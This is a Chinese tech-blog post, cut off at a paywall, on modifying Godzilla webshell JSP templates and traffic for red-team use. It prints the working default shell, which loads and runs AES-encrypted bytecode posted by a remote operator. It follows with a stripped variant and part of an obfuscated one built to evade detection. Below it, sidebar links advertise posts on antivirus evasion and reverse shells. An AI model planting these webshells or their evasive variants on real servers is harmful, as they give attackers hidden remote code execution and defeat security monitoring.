红队必备知识:哥斯拉流量魔改以及模板生成

最新推荐文章于 2025-07-14 01:41:17 发布
原创 最新推荐文章于 2025-07-14 01:41:17 发布 · 467 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全威胁分析 #web安全 #系统安全 #java

JSP

这是哥斯拉默认加密方法AES_RAW,加解密流程 读取data-AES解密-AES加密-发送data

其中的xc 也就是aes加密的密钥,就是哥斯拉pass+key的md5编码

<%! String xc="c4ca4238a0b92382"; class X extends ClassLoader{publicX(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb,0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipherc=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,newjavax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch(Exception e){return null; }}%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int_num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",newX(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=newjava.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch(Exception e){}%>

这里我们直接去掉aes加解密操作

<%!class X extends ClassLoader {
  
   public X(ClassLoader z) {
  
     super(z); } public Class Q(byte[] cb) {
  
     return super.defineClass(cb, 0, cb.length); }}%><%try {
  
   byte[] data = new byte[Integer.parseInt(request.getHeader("Content-Length"))]; java.io.InputStream inputStream = request.getInputStream(); int _num = 0;  while ((_num += inputStream.read(data, _num, data.length)) < data.length);  if (session.getAttribute("payload") == null) {
  
     // 如果 session 中没有 "payload",加载字节码并将其转换为类   session.setAttribute("payload", newX(this.getClass().getClassLoader()).Q(data));} else {
  
     // 如果 session 中已有 "payload",执行后续操作   request.setAttribute("parameters", data);   Object f = ((Class)session.getAttribute("payload")).newInstance();      // 输出流用于收集类的执行结果   java.io.ByteArrayOutputStream arrOut = newjava.io.ByteArrayOutputStream();   f.equals(arrOut);   f.equals(pageContext);   f.toString();      // 输出执行结果   response.getOutputStream().write(arrOut.toByteArray()); }} catch (Exception e) {}%>

其中也可以这样子修改,只需要保留主体逻辑,这样修改避免了定义classloader方法而是采用字节码动态加载

<%!%><%try {
  
   byte[] data = new byte[Integer.parseInt(request.getHeader("Content-Length"))]; java.io.InputStream inputStream = request.getInputStream(); int _num = 0;  while ((_num += inputStream.read(data, _num, data.length)) < data.length);  if (session.getAttribute("payload") == null) {
  
     // 如果 session 中没有 "payload",加载字节码并将其转换为类    Class cc = Class.forName("c" + new String(new byte[]{111,109,46,115,117,110,46,106,109,120,46,114,101,109,111,116,101,46,117,116,105,108,46,79,114,100,101,114,67,108,97,115,115,76,111,97,100,101,114}) + "s");    Object a = Thread.currentThread().getContextClassLoader();    Object b = cc.getDeclaredConstructor(new Class[]{ClassLoader.class,ClassLoader.class}).newInstance(a, a);    java.lang.reflect.Method c = cc.getSuperclass().getDeclaredMethod("d" +
最低0.47元/天 解锁文章
红队攻防渗透技术实战流程:红队目标上线之免杀对抗-Webshell篇&哥斯拉&打乱特征指纹&新增后门混淆&过云查杀&过流量识别
HACKONE的博客
06-30 702
这下面的逻辑就是我们再使用模式PHP_XOR_RAW和 PHP_XOR_BASE64生成木马时,会先通过代码中的genenrate找到template模板下的木马文件。通过替换密钥和key后直接按照template模板下的木马生成wenshell,所以我们把原来木马的模板替换成免杀的模板后,替换密钥和key后可直接生成免杀马。setting是控制下面显示的界面 asseet是实现端口扫描的,php目录下的文件是界面的显示的东西。这里定义的生成类,就是要找template下的生成文件。
哥斯拉Webshell
bring_coco的博客
03-03 6089
一.启动 命令java -jar Godzilla-V2.96.jar 启动时同目录会生成data.db数据库存放数据 启动成功界面如下 二.使用(在本机实测) 这里演示jsp文件进行连接(需要提前配置好jsp环境) 1.点击管理->生成 这里默认密码,密钥(也可以更,只要跟连接时候保持一致即可) 接下来将生成的文件存放在Tomcat目录下,注意是在Tomcat–>webapps–>ROOT目录下 可以打开指定路径,此时生成的shell.jsp已经生成 接下来点击目标—&
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1754
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
实战分析红队哥斯拉Webshell
热门推荐
include_voidmain的博客
05-31 1万+
声明 以下内容,来自先知社区的ga0weI作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。 0x01 前言 前两天从某次演习中拿到了一个webshell样本,该webshell通信未产生相关任何告警,因此该样本在免杀以及bypass相关waf和ids设备上是非常值得学习的。 分析过程中不难发现其实这个就是一个的Godzilla,其的思路比较出奇,并且其免杀做的很到位。 为什么说这个webshell是的哥斯
【免杀】-哥斯拉(入门)
qq_55349490的博客
06-04 4603
我们都知道哥斯拉默认生成的shell是很容易被安全软件检测出来的。所以我们需要修shell生成逻辑,以达到免杀。除了修指纹外,我们还需要修数据包的加密方式,以及生成的shell以实现免杀的效果。我们知道,哥斯拉强大之处就在于它的插件功能。插件我们也可以尝试自己开放插件。分析多个流量包可以发现哥斯拉有3个强特征。尝试搜索关键词搜索不到,发现是。
红队装备库:CobaltStrikeAggressor脚本开发.pdf
05-03
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿...
Go红队工具开发:C2服务器与隐蔽信道实现.pdf
05-03
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿...
红队武器化流量:CobaltStrikeDNS隧道变异模式全解析.pdf
06-10
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿...
哥斯拉木马解析 + bypass 免杀代码分析+回调webshell
m0_64180167的博客
12-28 5026
这里也是跟着大佬走的这里首先我是去看了看bypass 学习一下然后我们就可以发现对比我这里将混淆什么的都去掉下面是原版的哥斯拉能发现 确实通过特殊的编码和对字符串的处理,实现bypass落地的时候确实火绒扫不出来我们将两种放到 阿里云中查看一下可以发现已经被识别到了(肯定是被抓特征了)这里我们首先就开始分析一下哥斯拉的php木马类别是 php xor base64这里是基本的代码查看 这里有些是我自己加上去进行判断的这里给出一下大致流程顺便给出session的解释。
渗透测试之哥斯拉实战
大河之犬的博客
03-28 2246
可以直接在这里使用meterpreter命令进行对服务端的控制。选择目标 - 添加,配置连接信息,之后测试连接成功!php的shell功能如图。先要进行数据库的配置信息。可以直接在这里打包全站。
Godzilla(哥斯拉)安装与使用
剁椒鱼头没剁椒的博客
12-22 1万+
这里介绍可以直接看作者的对软件的介绍,这里就不复述了,复述也是类似抄一遍,没准还没说对。
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
C20220511的博客
07-19 2530
本文基于冰蝎Behinder_v3.0.11和哥斯拉v4.00-godzilla,对它们的加解密方式进行识别和分析【附简易解密脚本】,希望能在行动中助大家一臂之力。
2022某世赛选拔流量分析(jsp哥斯拉流量
weixin_52365980的博客
07-02 1698
"49b3c226f3e5f760" + AES128加密后base64编码内容 + "fd90ec52257b31ef"3.请写出flag.png中flag内容,格式:flag{…变量xc(密钥)作AES的密钥,密钥16字节,对应也就是。2.请写出黑客第一次连接之后,给flag图片加密的密码。encflag就是最后一个返回包的base64字符串。5.请写出最后输出的flag,格式:flag{…流量包39上传了一个zip,解压出来有一个。1.请写出黑客第一次上传的木马的密码。
WAF攻防-菜刀&冰蝎&哥斯拉&流量通讯&特征绕过&检测反制&感知
今天是几号的博客
04-12 1974
使用Proxifier进行流量转发至Burp抓包分析(使用Wireshake也可以)# ==冰蝎3-流量&绕过&特征&检测== **面试必问的,别问我怎么知道的** 冰蝎利用了服务器端的脚本语言加密功能,通讯的过程中, 消息体内容采用 AES 加密,基于特征值检测的安全产品无法查出 ## 特征 密钥使用连接密码的md5结果的前16位 如果对方使用的默认密码rebeyond,那么密钥就是e45e329feb5d925b,那么这也算是一个特征
【DVWA系列】——File Upload——High详细教程(webshell工具哥斯拉
最新发布
2402_84408069的博客
07-14 1350
摘要:本文详细解析DVWA File Upload(High级别)的防御机制,包括后缀白名单、MIME校验及文件头检测,并提出通过图片马绕过防护的方法。教程涵盖三种图片马制作技术(二进制合并、010 Editor修哥斯拉生成),配合Burp篡Content-Type实现上传。利用文件包含漏洞触发执行,并配置哥斯拉连接WebShell。强调需在授权环境下测试,遵守法律法规,禁止非法用途。文中包含完整操作流程、错误排查及自动化利用技巧,附流程图辅助理解。
[二开]_哥斯拉-PHP流量特征修
qq_52579508的博客
05-09 1566
一. 说明哥斯拉流量特征很容易就会被杀软、EDR识别,修哥斯拉流量特征可以绕过EDR等杀毒软件。本次二开是哥斯拉4.0.1。原版地址:https://github.com/BeichenDream/Godzilla/releases/tag/v4.0.1-godzilla环境:IDEA、JAVA1.8二. 反编译反编译有三种方式。在线反编译:https://www.decompiler.co...
0x145 Webshell篇&冰蝎&打乱特征指纹&新增加密协议&过后门查杀&过流量识别
m0_74048540的博客
02-25 1326
本文探讨了恶意工具冰蝎和哥斯拉流量特征的过程。首先,通过抓包分析流量特征,修请求头和请求体以打乱原特征,增加加密算法以规避检测。冰蝎的涉及反编译数据包,分析流量特征及添加新加解密协议。相似地,哥斯拉过程同样包括反编译和修代码,以绕过hash校验并抓取流量特征。最终,针对生成的shell进行加密处理以增强隐蔽性,探讨了更为复杂的混淆技巧,为网络安全领域的技术研究提供了借鉴。
玄机-哥斯拉4.0流量分析
m0_73481504的博客
10-29 1935
首先要了解哥斯拉的特征弱特征:pass字段(哥斯拉必须通过某个参数来传入数据,默认为pass)、Accept字段、UA、以based64传输数据(若选择raw方式则不会有此特征)强特征:1.首次请求的固定三个数据包,不论哪种类型的shell哥斯拉在刚开始都会发起这三个请求。(第一个请求包数据很大,响应包空并设置sessionid;第二个与第三个请求都会携带cookie且有响应数据);2.cookie后分号;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值